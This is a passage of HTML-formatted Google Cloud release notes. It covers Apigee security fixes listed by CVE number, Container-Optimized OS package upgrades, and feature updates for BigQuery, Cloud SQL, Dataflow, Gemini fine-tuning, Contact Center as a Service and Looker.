href="https://nvd.nist.gov/vuln/detail/CVE-2026-32289"&gt;CVE-2026-32289&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39350"&gt;CVE-2026-39350&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39817"&gt;CVE-2026-39817&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39819"&gt;CVE-2026-39819&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39823"&gt;CVE-2026-39823&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39825"&gt;CVE-2026-39825&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39826"&gt;CVE-2026-39826&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-41413"&gt;CVE-2026-41413&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42507"&gt;CVE-2026-42507&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-4437"&gt;CVE-2026-4437&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-4438"&gt;CVE-2026-4438&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;N/A&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Security fix for Apigee infrastructure.&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bug ID&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;515788622&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Upgraded the default outbound TLS protocol from TLSv1.2 to TLSv1.3 on JVMs that support it. Per-proxy &lt;code&gt;&amp;lt;SSLInfo&amp;gt;&amp;lt;Protocols&amp;gt;&lt;/code&gt; settings continue to take precedence, and the new &lt;code&gt;HTTPClient.outbound.tls.protocol&lt;/code&gt; override lets operators force a specific protocol.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;184266748&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fixed an issue where ApigeeDatastore TLS certificate creation could fail in namespaces with longer names when the certificate common name exceeded the 64-byte limit.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;286069772&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Added a per-gateway &lt;code&gt;proxyProtocol.mode&lt;/code&gt; property (strict, permissive, disable) on Apigee ingress gateway components to opt in to HAProxy PROXY-protocol parsing. The property defaults to disable.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;N/A&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Updates to infrastructure and libraries.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can use the BigQuery Data Transfer Service to transfer metadata from the
following data sources into Knowledge Catalog:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/oracle-transfer#transfer_metadata"&gt;Oracle&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/mysql-transfer#transfer_metadata"&gt;MySQL&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This feature is in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Billing&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Resource-based CUD recommendations available for Compute Engine GPUs, Local SSD disks, and OS licenses&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Resource-based committed use discount (CUD) recommendations are generally available (GA) for GPUs, Local SSD disks, and premium operating system (OS) licenses.&lt;/p&gt;
&lt;p&gt;CUD recommendations provide insight into any additional commitments that you can
purchase to optimize the costs of the resources that you run. You can use these
recommendations and purchase commitments for resource usage that isn't covered
by commitments and is being charged at list prices. Google Cloud analyzes your
compute instance spending trends with and without a commitment and generates
CUD recommendations on a monthly basis.&lt;/p&gt;
&lt;p&gt;For more information about how CUD recommendations are generated, what resource
types are supported, and how to use recommendations to purchase commitments, see
&lt;a href="https://docs.cloud.google.com/docs/cuds-recommender"&gt;Get recommendations for committed use discounts (CUDs)&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Logging&lt;/h2&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;If the parent project for a Cloud Storage bucket changes, a log sink
stops routing log entries to that bucket. For more information about error
messages and recovery options, see
&lt;a href="https://docs.cloud.google.com/logging/docs/export/troubleshoot#errors_exporting_to_cloud_storage"&gt;Errors routing to Cloud Storage&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Monitoring&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Metrics Explorer can automatically break down a chart into a series of tiles,
with each displaying time-series data for a specific label key. This view helps
you identify spikes, dips, or trends that the aggregation settings might
otherwise hide.&lt;/p&gt;
&lt;p&gt;To learn more, see
&lt;a href="https://docs.cloud.google.com/monitoring/charts/breakdown-chart-by-labels"&gt;Break down a chart by labels&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud SQL for MySQL&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Customer-managed encryption key (CMEK) support for Cloud SQL enhanced backups is
generally available. You can protect your CMEK-enabled Cloud SQL instances
using Google Cloud Backup and DR Service.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/sql/docs/mysql/backup-recovery/backup-options"&gt;Choose your backup
option&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud SQL for PostgreSQL&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Customer-managed encryption key (CMEK) support for Cloud SQL enhanced backups is
generally available. You can protect your CMEK-enabled Cloud SQL instances
using Google Cloud Backup and DR Service.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/sql/docs/postgres/backup-recovery/backup-options"&gt;Choose your backup
option&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud SQL for SQL Server&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Customer-managed encryption key (CMEK) support for Cloud SQL enhanced backups is
generally available. You can protect your CMEK-enabled Cloud SQL instances
using Google Cloud Backup and DR Service.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/sql/docs/sqlserver/backup-recovery/backup-options"&gt;Choose your backup
option&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Service Mesh&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://docs.cloud.google.com/service-mesh/docs/data-plane-extensibility#typegoogleapiscomenvoyextensionsfiltershttpluav3lua"&gt;Envoy Lua Filter&lt;/a&gt;
is now available as a preview feature in the rapid release channel.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Compute Engine&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally available&lt;/strong&gt;: You can create instances all at once in a regional
managed instance group (MIG) by using resize requests. For more information, see
&lt;a href="https://docs.cloud.google.com/compute/docs/instance-groups/about-resize-requests-mig"&gt;About resize requests in a MIG&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally available&lt;/strong&gt;: Resource-based committed use discount (CUD)
recommendations are available for GPUs, Local SSD disks, and premium operating
system (OS) licenses.&lt;/p&gt;
&lt;p&gt;CUD recommendations provide insight into any additional commitments that you can
purchase to optimize the costs of the resources that you run. You can use these
recommendations and purchase commitments for resource usage that isn't covered
by commitments and is being charged at list prices. Google Cloud analyzes your
compute instance spending trends with and without a commitment and generates
CUD recommendations on a monthly basis.&lt;/p&gt;
&lt;p&gt;For more information about how CUD recommendations are generated, what resource
types are supported, and how to use recommendations to purchase commitments, see
&lt;a href="https://docs.cloud.google.com/docs/cuds-recommender"&gt;Get recommendations for committed use discounts (CUDs)&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Container Optimized OS&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-129-19506-224-52_"&gt;cos-129-19506-224-52 &lt;a id="&amp;quot;cos-arm64-129-19506-224-52&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/fd31f7d8b65031d8f8a98c7aafc59c84a831dfc0"&gt;COS-6.12.90&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v27.5.1&lt;/td&gt;
&lt;td&gt;v2.2.3&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/19506.224.52/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-dev-133-19879-0-0_"&gt;cos-dev-133-19879-0-0 &lt;a id="&amp;quot;cos-arm64-dev-133-19879-0-0&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/ef0c067405ff6956b986d853c39c609e6d457228"&gt;COS-6.18.35&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v29.4.3&lt;/td&gt;
&lt;td&gt;v2.2.3&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/19879.0.0/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Minor changes.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded app-admin/logrotate to v3.22.0-r1.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded app-admin/oslogin to v20260605.00.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded chromeos-base/google-breakpad to v2026.06.03.194714-r275.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded cos-gpu-installer to v2.7.4.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded dev-db/sqlite to v3.53.2-r1.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded sys-apps/less to v704.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-50195, CVE-2026-53488, CVE-2026-53492, CVE-2026-53489, and CVE-2026-47262 in app-containers/containerd.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-125-19216-395-112_"&gt;cos-125-19216-395-112 &lt;a id="&amp;quot;cos-arm64-125-19216-395-112&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/1dd147644c2ffa2b98ed57056012bfed5c2d2190"&gt;COS-6.12.85&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v27.5.1&lt;/td&gt;
&lt;td&gt;v2.1.7&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/19216.395.112/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Minor changes.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-121-18867-381-184_"&gt;cos-121-18867-381-184 &lt;a id="&amp;quot;cos-arm64-121-18867-381-184&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/0cf599aaec4ef39b7c8fddb48963b257e7b1e3c7"&gt;COS-6.6.137&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v27.5.1&lt;/td&gt;
&lt;td&gt;v2.0.8&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/18867.381.184/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-5928 in sys-libs/glibc.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-117-18613-613-62_"&gt;cos-117-18613-613-62 &lt;a id="&amp;quot;cos-arm64-117-18613-613-62&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/6baf9cd9b87dc7ebfbc0bf533cef571e4fbcf31e"&gt;COS-6.6.137&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v24.0.9&lt;/td&gt;
&lt;td&gt;v1.7.31&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/18613.613.62/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Minor changes.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Dataflow&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can now use &lt;a href="https://docs.cloud.google.com/compute/docs/disks/hd-types/hyperdisk-balanced"&gt;Hyperdisk Balanced&lt;/a&gt;
disks for Dataflow worker VMs. With Hyperdisk Balanced disks, you can provision
IOPS and throughput independently of disk size by using the &lt;code&gt;diskProvisionedIOPS&lt;/code&gt;
and &lt;code&gt;diskProvisionedThroughput&lt;/code&gt; pipeline options (Java SDK) or
&lt;code&gt;disk_provisioned_iops&lt;/code&gt; and &lt;code&gt;disk_provisioned_throughput_mibps&lt;/code&gt; pipeline options
(Python and Go SDKs). For more information, see
&lt;a href="https://docs.cloud.google.com/dataflow/docs/guides/configure-worker-vm#disk-type"&gt;Disk type&lt;/a&gt; and
&lt;a href="https://docs.cloud.google.com/dataflow/docs/guides/configure-worker-vm#provisioned-performance"&gt;Provision IOPS and throughput&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise Agent Platform&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Supervised fine-tuning available for Gemini 3.1 Flash Lite and Gemini 3.5 Flash in Public Preview&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Supervised fine-tuning is now available for the &lt;code&gt;gemini-3.1-flash-lite&lt;/code&gt; and
&lt;code&gt;gemini-3.5-flash&lt;/code&gt; models in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;. Model tuning
for Gemini 3.1 Flash Lite and Gemini 3.5 Flash is restricted to &lt;code&gt;us-central1&lt;/code&gt;
and &lt;code&gt;europe-west4&lt;/code&gt; and tuned model serving is restricted to the &lt;code&gt;us&lt;/code&gt; and &lt;code&gt;eu&lt;/code&gt;
multi-region endpoints.&lt;/p&gt;
&lt;p&gt;See &lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/gemini-supervised-tuning"&gt;About supervised
fine-tuning&lt;/a&gt;
for more information.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Provisioned Throughput support for supervised fine-tuned Gemini 3 model inference.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Provisioned Throughput can be used to assure supervised fine-tuned inference using the same quota. Supervised fine-tuned inference for Gemini 3 models incurs a higher burndown rate compared to base model inference. Learn more &lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/provisioned-throughput/supported-models#supervised-fine-tuned-model-support"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google Cloud Contact Center as a Service&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Google Cloud CCaaS 4.43&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We've released version 4.43 of Google Cloud CCaaS.&lt;/p&gt;
&lt;p&gt;The timing of the update to your instance depends on the deployment schedule
that you have chosen. For more information, see &lt;a href="https://cloud.google.com/contact-center/ccai-platform/docs/deployment-schedules"&gt;Deployment
schedules&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Calls to direct numbers display language selection in the call adapter&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When an agent receives a direct call, the call adapter now displays the language
that the caller chose during language selection.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/contact-center/ccai-platform/docs/call-settings#direct-phone-numbers"&gt;Direct phone
numbers&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;HubSpot: Control the display of CRM account fields and record fields in the
agent adapter&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can now control how CRM account fields (contact and company) and record
fields (ticket and deal) appear in the agent adapter for HubSpot integrations.
This gives agents immediate access to important context such as VIP status,
account ownership, and ticket priority during live interactions.&lt;/p&gt;
&lt;p&gt;Administrators: In the &lt;strong&gt;Settings &lt;span&gt;&amp;gt;&lt;/span&gt; Developer Settings &lt;span&gt;&amp;gt;&lt;/span&gt;
CRM &lt;span&gt;&amp;gt;&lt;/span&gt; Agent Platform &lt;span&gt;&amp;gt;&lt;/span&gt; HubSpot &lt;span&gt;&amp;gt;&lt;/span&gt; Account
Lookup&lt;/strong&gt; section, there are two new &lt;strong&gt;CRM Account Display Fields&lt;/strong&gt; sections and
a new &lt;strong&gt;CRM Record Display Fields&lt;/strong&gt; section.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/contact-center/ccai-platform/docs/hubspot-lookups"&gt;HubSpot
lookups&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;The chat API supports CSAT surveys&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can now conduct customer satisfaction (CSAT) surveys using the chat API. You
can configure CSAT surveys at the global level and at the queue level.&lt;/p&gt;
&lt;p&gt;Administrators: On the &lt;strong&gt;Settings &lt;span&gt;&amp;gt;&lt;/span&gt; Chat&lt;/strong&gt; page, there's a new &lt;strong&gt;Chat
API&lt;/strong&gt; section.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/contact-center/ccai-platform/docs/csat-chat-api#adding_translations_for_multiple_languages"&gt;CSAT in the chat
API&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;This release addresses the following issues:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where uploading a PDF document to a chat made the
conversation history unavailable during a session transfer or page refresh.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where direct SMS chats didn't send termination notifications
at the end of the chat.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where the after-hours voicemail greeting didn't play during
agent-to-agent call deflections.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where SIP and IVR calls intermittently failed if the caller
disconnected before a virtual agent was assigned.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where calls deflected to voicemail during after-hours were
incorrectly reported as errors in the &lt;strong&gt;All Call History&lt;/strong&gt; report.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where direct inbound calls were incorrectly deflected to
voicemail during an agent's available hours when agent deflections were
enabled.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where inbound voice calls failed with an application error
during the initial lookup phase.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed a Kustomer issue where Agent Assist transcripts were
delivered to the CRM as file attachments instead of timeline notes.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where the &lt;strong&gt;In Progress&lt;/strong&gt; banner and the &lt;strong&gt;Cancel&lt;/strong&gt; button
didn't appear immediately after a virtual task assistant request was
initiated.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where campaigns stayed in a paused state instead of
transitioning to a completed state after finishing.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed a Deltacast issue where chats weren't routed correctly to available
agents when the company-wide concurrency setting was disabled but individual
agent limits were active.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where supervisor monitoring and whisper features caused
system errors during call recording.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where agents couldn't dismiss forwarded voicemails if the
source queue had been deleted.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where Telnyx calls that ended normally didn't generate a
disconnect event, resulting in missing recordings, missing transcripts, and
calls appearing to still be active in the CCAI Platform portal.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where consecutive IVR queue deletions caused performance
delays and timeout errors.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where queue-level automatic wrap-up settings were
disabled without an end-user action.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where the queue settings page displayed inconsistent whisper
announcement statuses and didn't play queue names during calls.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where the &lt;strong&gt;Queues&lt;/strong&gt; page displayed incorrect overcapacity
deflection settings when end-users navigated quickly between different
queues.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where virtual agents attempted to fail over to a human agent
during outages even when no human agent was configured.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed a Salesforce issue where initiating an outbound call from an active
case linked to a separate case assigned to a different user, incorrectly
overriding ownership of the second case.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed a Kustomer issue where duplicate conversation records were created in
the CRM during calls.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed a Kustomer issue where SMS chat sessions didn't create tickets in the
CRM.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where underscores in an email address in a shortcut
were converted to double backslashes when an agent sent the email address to
an end-user.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where deleting Twilio records caused unnecessary errors.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where disabling the global CSAT setting prevented IVR surveys
from being offered to callers, even when the surveys were enabled for
specific queues.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Looker&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Starting June 22, 2026, the following features will begin rolling out as part of Looker 26.10.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;New in Looker 26.10, Looker project deployments have transitioned from a synchronous to an asynchronous process to improve reliability and efficiency. Deployments now run as background processes. Instead of waiting for a deployment to finish, the system immediately returns a deployment ID, allowing you to continue your work without being blocked. In addition, the Looker IDE's &lt;strong&gt;Deploy&lt;/strong&gt; tab is visible for all LookML projects, not just for projects where &lt;a href="https://docs.cloud.google.com/looker/docs/advanced-deploy-mode"&gt;advanced deploy mode&lt;/a&gt; is enabled. For projects where advanced deploy mode is disabled, when a LookML developer &lt;a href="https://docs.cloud.google.com/looker/docs/version-control-and-deploying-changes#deploying_to_production"&gt;deploys to production&lt;/a&gt;, the Looker IDE displays a confirmation that the deployment was submitted. The confirmation dialog has a &lt;strong&gt;Go to Deployment Manager&lt;/strong&gt; button, which you can click to open the &lt;strong&gt;Deploy&lt;/strong&gt; tab in the IDE and see the status of your recent deployments.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This item was added on June 23, 2026.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Now available in preview, model localization is supported for imported projects. By default, Looker uses the locale definitions from the importing project only, if the importing project has locale definitions. However, if you want to merge the locale definitions from an imported project with the locale definitions of the importing project, you can add the &lt;code&gt;import_locale_defs: yes&lt;/code&gt; statement to the &lt;code&gt;localization_settings&lt;/code&gt; parameter in your importing project's manifest file. See the &lt;a href="https://docs.cloud.google.com/looker/docs/model-localization#model_localization_and_project_import"&gt;Localizing your LookML model&lt;/a&gt; documentation page for more information.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Dashboard editors can now enable the &lt;a href="https://docs.cloud.google.com/looker/docs/editing-user-defined-dashboards#preserve-dashboard-layout"&gt;&lt;strong&gt;Preserve desktop layout&lt;/strong&gt;&lt;/a&gt; setting to preserve the layout of a dashboard when users view the dashboard in a smaller browser or on a mobile screen. Users can navigate the dashboard with a zoom slider that enlarges tiles, and they can &lt;a href="https://docs.cloud.google.com/looker/docs/mobile-app-viewing-dashboards#viewing_new_dashboards_in_the_app"&gt;switch between desktop and mobile view&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/continuous-integration"&gt;Continuous Integration (CI)&lt;/a&gt; suites can now be configured to &lt;a href="https://docs.cloud.google.com/looker/docs/ci-create-suite#schedule-trigger"&gt;automatically run on a recurring schedule&lt;/a&gt;.&lt;/p&gt;
